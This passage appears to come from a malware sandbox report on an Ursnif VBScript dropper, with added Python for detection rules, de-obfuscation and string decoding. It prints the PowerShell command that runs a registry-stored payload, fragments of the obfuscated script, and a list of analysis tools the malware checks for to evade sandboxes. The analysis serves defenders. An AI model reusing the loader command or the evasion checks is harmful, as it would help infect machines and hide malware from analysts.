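              r"""'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))"""),
    ProcEvent(4300, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"""'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline'"""),
    # Benign control: an operator's PowerShell from Explorer must not fire any rule.
    ProcEvent(4400, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\explorer.exe",
              "powershell.exe -NoProfile -Command Get-Date"),
]

if __name__ == "__main__":
    for pid, reason in hunt(SAMPLE_EVENTS):
        print(pid, reason)
```

Two caveats when moving this onto real telemetry. The .vbs creates its children through WMI (Win32_Process::Create, listed above), so in Sysmon those children carry WmiPrvSE.exe as the parent rather than wscript.exe; a parent-child rule on wscript.exe alone misses that hop, which is why the rules here key on mshta.exe, powershell.exe and csc.exe instead. And because the stages live in the registry, the registry path HKCU\Software\AppDataLow\Software\Microsoft\{GUID} is itself worth hunting (registry value-set events on that path), since the files in %TEMP% are deleted after use.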

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.ScriptFullName)kieGl = iHLOpqas.ReadalliHLOpqas.close'MsgBox((((34 + (7395 - 250.0)) - 7174.0) + 1522.0))REM wildcatter something155 stratus briefcase Kikuyu prostitute chivalrous sextic Springfield embouchure bronze Hiawatha Hester airman weatherstripping quiver955 sob Kingsbury799 agreeable Chiang juncture Frankel custody imagine Clare garlic molecular gloss, 158521 Raul Walpole desolater ambulant jilt voluptuous, knoll lampoon Calkins194 somatic bonze megavolt tortoiseshell defector. Allan mock refrain wineskin onyx milt commutate spalding179 fanout urban bylaw fright lucrative355 competitor Venetian clattery Gaberones effaceable Russell221 typewrite Lagos Romania caching battalion taverna breast Blackburn peril pianissimo inquisitive roughshod gabbro758 hillmen digit roughen781. 3555716 interstitial 'MsgBox(ubound(Split (kieGl,vbCrlf))+(((261 - 255.0) + 228.0) - (234 - 1.0)))'MsgBox((((34 + (7395 - 250.0)) - 7174.0) + 1522.0) - ubound(Split (kieGl,vbCrlf))+((41 + (5 + 742.0)) - (66 + 721.0)))' wine tenement remediable middlemen gunsling Wichita prime lorry lead hurty, bivalve752 constant contiguous anthracnose pentagonal elevate Delphi abjure seam Baltic Costa Compagnie, substantiate either, 8158269 spout subject gobbledygook circumspect faze winch Westfield265, 7567782 bomb brow anarch Menorca contemporaneous wreak, 6643695 torrid echoes maudlin mangy ice plummet anchovy xylene313 Charta Leyden Mercedes ethnic995 mouthpart. 
733637 Stearns book761 cook, forthcoming, flinty Johannes soapy Ballard334 Margery conclude retrofitting alias asylum451 exemplary Jude201 troff End FunctionFunction cohere844()on error resume nextIf (InStr(WScript.ScriptName, cStr(395578831)) > 0 And YMkye = 0) ThenExit FunctionEnd IfSet Missy965Service = GetObject("winmgmts:\\.\root\cimv2")Set XNhKYlItems = Missy965Service.ExecQuery("Select * from Win32_Processor", , (((79 + 10.0) + (0.0)) - (160 - 119.0)))For Each chaste In XNhKYlItemsIf chaste.NumberOfCores < ((61 + (-25.0)) + (-((154 - 76.0) + (-45.0)))) Thenscreech176 = TrueEnd IfREM contretemps sardonic crew pilfer criterion qs clairvoyant minnow Babylon516 pitfall Ryan153 whore chairwoman polyphony, Bushnell378 lineage calumny138 violent Daytona whiplash soma404 combustion differentiate Waring Eisenhower airman573 neednt812 flowchart radius300 Bridget, squirmy hop indent MacArthur penal489 Christ stylus prestige taxation peat shako591 drib axe. wigwam path349 carton sickle, honorific yipping, pitchblende418 harrow baroness brisk wane racemose piano sparrow arm63 absolute. clinch embower934, Kemp dig quizzing coachwork, 1152283 Whippany eight465 molasses horseplay381 scapular counterpoint dehydrate acclamation radices Next' archipelago accord landlady. diagrammed trellis additive oceanic correct. 9674830 TWA465, 4289949 ware oboe boatyard advisee, Pomona hydrogenate flan939 shish. alphabet homestead dogmatist niggle draft copperhead cryptanalysis swamp Elkhart accurate cherubim illimitable212. 437
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) Jump to behavior
Compiles C# or VB.Net code
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\x0s3qhtp.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\x0s3qhtp.cmdline'
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\explorer.exe Code function: 36_2_04CF5699 push 3B000001h; retf 36_2_04CF569E
Source: C:\Windows\System32\control.exe Code function: 37_2_00565699 push 3B000001h; retf 37_2_0056569E
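The AMSI capture above shows the script's two obfuscation tricks: every numeric literal is replaced by a nested arithmetic expression such as ((61 + (-25.0)) + (-((154 - 76.0) + (-45.0)))), and the code is padded with REM and ' comments full of dictionary words. The constants matter, because the Win32_Processor query compares NumberOfCores against one of them to decide whether it is running in a sandbox. The following is an added example, not part of the report or of the sample: a constant folder that repeatedly evaluates the innermost purely numeric parenthesised groups (and nothing else, so identifiers and function calls survive) until no such group remains. The snippets it runs on are copied from the capture above; everything else is an assumption.

```python
"""Fold the arithmetic-expression obfuscation used by the VBS dropper (added example)."""
import ast
import re

# A parenthesised group with no nested parentheses ...
_LEAF = re.compile(r"\(([^()]*)\)")
# ... whose body is only numbers, whitespace and + - * /
_NUMERIC = re.compile(r"^[\s\d.+\-*/]+$")


def _eval(node):
    """Evaluate a parsed arithmetic expression; anything but numbers and + - * / is rejected."""
    if isinstance(node, ast.Expression):
        return _eval(node.body)
    if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
        return node.value
    if isinstance(node, ast.UnaryOp) and isinstance(node.op, (ast.USub, ast.UAdd)):
        value = _eval(node.operand)
        return -value if isinstance(node.op, ast.USub) else value
    if isinstance(node, ast.BinOp):
        ops = {ast.Add: lambda a, b: a + b, ast.Sub: lambda a, b: a - b,
               ast.Mult: lambda a, b: a * b, ast.Div: lambda a, b: a / b}
        fn = ops.get(type(node.op))
        if fn is not None:
            return fn(_eval(node.left), _eval(node.right))
    raise ValueError("not a plain arithmetic expression")


def _fmt(value):
    # VBScript's 36.0 - 33.0 compares as 3; print integral results without the trailing .0
    if isinstance(value, float) and value.is_integer():
        return str(int(value))
    return repr(value)


def _fold_leaf(match):
    body = match.group(1)
    if not _NUMERIC.match(body) or not re.search(r"\d", body):
        return match.group(0)             # e.g. (kieGl,vbCrlf): leave identifiers alone
    try:
        return _fmt(_eval(ast.parse(body.strip(), mode="eval")))
    except (SyntaxError, ValueError, ZeroDivisionError):
        return match.group(0)


def fold_constants(source: str) -> str:
    """Collapse innermost numeric groups, innermost first, until nothing changes."""
    previous = None
    while previous != source:
        previous, source = source, _LEAF.sub(_fold_leaf, source)
    return source


# Lines copied from the AMSI capture in the report.
CORE_CHECK = "If chaste.NumberOfCores < ((61 + (-25.0)) + (-((154 - 76.0) + (-45.0)))) Then"
WMI_FLAGS = 'ExecQuery("Select * from Win32_Processor", , (((79 + 10.0) + (0.0)) - (160 - 119.0)))'

if __name__ == "__main__":
    print(fold_constants(CORE_CHECK))   # the sandbox test: fewer than 3 cores
    print(fold_constants(WMI_FLAGS))    # 48 = wbemFlagReturnImmediately | wbemFlagForwardOnly
```

The folded output reads "NumberOfCores < 3": a machine reporting fewer than three cores trips the screech176 flag, which is the sandbox check the report summarises as "Queries sensitive service information (via WMI ...)". The third ExecQuery argument folds to 48, the usual wbemFlagReturnImmediately + wbemFlagForwardOnly flags, so that call is otherwise ordinary. The folder deliberately does not strip comments: the AMSI capture has the script's line breaks collapsed, so a naive ' or REM stripper on that text would eat live code along with the junk words.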

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\a11zr31h.dll
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\Greenbelt.iso
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\x0s3qhtp.dll
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\Greenbelt.iso

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 00000006.00000003.579535833.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579647192.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.646154649.0000000002800000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579582589.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.587774108.000000000512B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579617735.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.685503621.0000000004D1E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579669420.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579729595.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579690205.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.701647863.00000000027B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579713449.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.675164378.000000000058E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3508, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 3596, type: MEMORY
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\my_presentation_96642.vbs
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.431652594.0000020D1DD68000.00000004.00000001.sdmp Binary or memory string: A9$BEHAVIORDUMPER.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: DUMPCAP.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXEA
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\control.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4009
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1386
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\a11zr31h.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\x0s3qhtp.dll
Source: C:\Windows\System32\wscript.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Greenbelt.iso
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 5960 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2364 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4424 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6708 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local
Source: explorer.exe, 00000024.00000000.659329221.0000000007BBC000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: wscript.exe, 00000000.00000002.438287245.0000020D23320000.00000002.00000001.sdmp, explorer.exe, 00000024.00000000.660611050.0000000007F40000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000024.00000000.659425273.0000000007C3C000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00$
Source: explorer.exe, 00000024.00000000.659194029.0000000007B29000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000024.00000000.659425273.0000000007C3C000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0s_
Source: explorer.exe, 00000024.00000000.650273069.00000000044B1000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}lo
Source: explorer.exe, 00000024.00000000.659329221.0000000007BBC000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000024.00000000.659194029.0000000007B29000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}T7
Source: wscript.exe, 00000000.00000002.438287245.0000020D23320000.00000002.00000001.sdmp, explorer.exe, 00000024.00000000.660611050.0000000007F40000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.438287245.0000020D23320000.00000002.00000001.sdmp, explorer.exe, 00000024.00000000.660611050.0000000007F40000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000000.00000003.414440390.0000020D1B59F000.00000004.00000001.sdmp Binary or memory string: )"ctejkrgnciq"ceeqtf"ncpfncf{0"fkcitcoogf"vtgnnku"cffkvkxg"qegcpke"eqttgev0"";896:52"VYC687.""64:;;6;"yctg"qdqg"dqcv{ctf"cfxkugg."Rqoqpc"j{ftqigpcvg"hncp;5;"ujkuj0"cnrjcdgv"jqoguvgcf"fqiocvkuv"pkiing"ftchv"eqrrgtjgcf"et{rvcpcn{uku"uycor"Gnmjctv"ceewtcvg"ejgtwdko"knnkokvcdng4340""659;969"Ukeknkcp"crrqkpvg"cd{uocn;8"Crjtqfkvg"fqemukfg"ectfkqnqi{0""3585532"ucnxg"Dq{nuvqp"j{ftcpigc"hcvjgt"tgppgv0"P[W"etwuv{"dtqcfgp"rwrcn"vjwpfgtuvqto99:"Ktqswqku"ukdkncpv"ykvjuvcpf"Ejtkuvqrjgt"Dwpfqqtc69;"xcfg"urknnqxgt"ogvcnnwtikuv"Nkpfuc{"rjqp{95;"rtwpg"oqttku76"rgvtqn"korwfgpv0"Jkvngt33:"Hgfqtc"cocvgwtkuj"Ectnkp"eqorngz"Cnvckt0""68784:4"Qtygnn.""98;8926"jqqh"ejwdd{0""4258396"ejggthwn"iqunkpi."Rcwnugp673"uvkttwr"
Source: explorer.exe, 00000024.00000000.659194029.0000000007B29000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}6B
Source: explorer.exe, 00000024.00000000.659329221.0000000007BBC000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: wscript.exe, 00000000.00000002.438287245.0000020D23320000.00000002.00000001.sdmp, explorer.exe, 00000024.00000000.660611050.0000000007F40000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
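The wscript.exe memory string quoted above that begins )"ctejkrgnciq"ceeqtf"ncpfncf{0 is the comment padding of the script's own source with every character code raised by two: ctejkrgnciq minus 2 per character is archipelago, and each " is a space. The Python below is an added example, not taken from the report: it recovers the shift by scoring candidate shifts on how much of the output is ordinary text and then decodes the string. MEMORY_STRING is the string quoted in the entry above, cut after illimitable212.

```python
import string

# wscript.exe memory string quoted in the report, shortened to its first part.
MEMORY_STRING = (
    ')"ctejkrgnciq"ceeqtf"ncpfncf{0"fkcitcoogf"vtgnnku"cffkvkxg"qegcpke"eqttgev0""'
    ';896:52"VYC687.""64:;;6;"yctg"qdqg"dqcv{ctf"cfxkugg."Rqoqpc"j{ftqigpcvg"hncp;5;"ujkuj0"'
    'cnrjcdgv"jqoguvgcf"fqiocvkuv"pkiing"ftchv"eqrrgtjgcf"et{rvcpcn{uku"uycor"Gnmjctv"'
    'ceewtcvg"ejgtwdko"knnkokvcdng4340"'
)

# Characters we accept as "looks like prose": letters, digits, space, light punctuation.
_PLAIN = set(string.ascii_letters + string.digits + " .,'")


def shift_decode(text: str, shift: int) -> str:
    """Subtract `shift` from every character code (inverse of an additive encoding)."""
    return "".join(chr((ord(c) - shift) % 0x110000) for c in text)


def plaintext_ratio(text: str) -> float:
    """Fraction of characters that fall in the plain-text set."""
    return sum(c in _PLAIN for c in text) / len(text) if text else 0.0


def recover_shift(text: str, max_shift: int = 32) -> int:
    """Return the shift whose decoding scores highest on plaintext_ratio."""
    return max(range(1, max_shift + 1),
               key=lambda s: plaintext_ratio(shift_decode(text, s)))


if __name__ == "__main__":
    shift = recover_shift(MEMORY_STRING)
    print(shift, shift_decode(MEMORY_STRING, shift))
```

Shift 2 is the unique shift at which every character of the string lands in the plain-text set, and the decoded text is the comment line ' archipelago accord landlady. diagrammed trellis additive oceanic correct. ... from the script excerpt at the top of this section. The rest of the quoted memory string decodes the same way (659;969"Ukeknkcp becomes 4379747 Sicilian, continuing the 437 the excerpt breaks off at). What the report establishes is only that wscript.exe held a +2-shifted copy of the script's own text in memory; how the script produced it cannot be determined from these entries.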

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: Greenbelt.iso.0.dr
Allocates memory in foreign processes
Source: C:\Windows\System32\control.exe Memory allocated: unknown base: 2270000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory allocated: unknown base: 1312DF50000 protect: page execute and read and write
Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FF91BA61580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FF91BA61580 protect: page execute read
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FF91BA61580 protect: page execute and read and write
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 1BA61580
Source: C:\Windows\System32\control.exe Thread created: unknown EIP: 1BA61580
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3508 base: 7C0000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3508 base: 7FF91BA61580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3508 base: 7FF91BA61580 value: 40
Maps a DLL or memory area into another process
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: unknown protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\control.exe Thread register set: target process: 3508
Source: C:\Windows\System32\control.exe Thread register set: target process: 5536
Writes to foreign memory regions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7C0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FF91BA61580
Source: C:\Windows\System32\control.exe Memory written: unknown base: 7C2000
Source: C:\Windows\System32\control.exe Memory written: unknown base: 7FF91BA61580
Source: C:\Windows\System32\control.exe Memory written: unknown base: 2270000
Source: C:\Windows\System32\control.exe Memory written: unknown base: 7FF91BA61580
Source: C:\Windows\System32\control.exe Memory written: unknown base: 7FF68BA05FD0
Source: C:\Windows\System32\control.exe Memory written: unknown base: 1312DF50000
Source: C:\Windows\System32\control.exe Memory written: unknown base: 7FF68BA05FD0
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
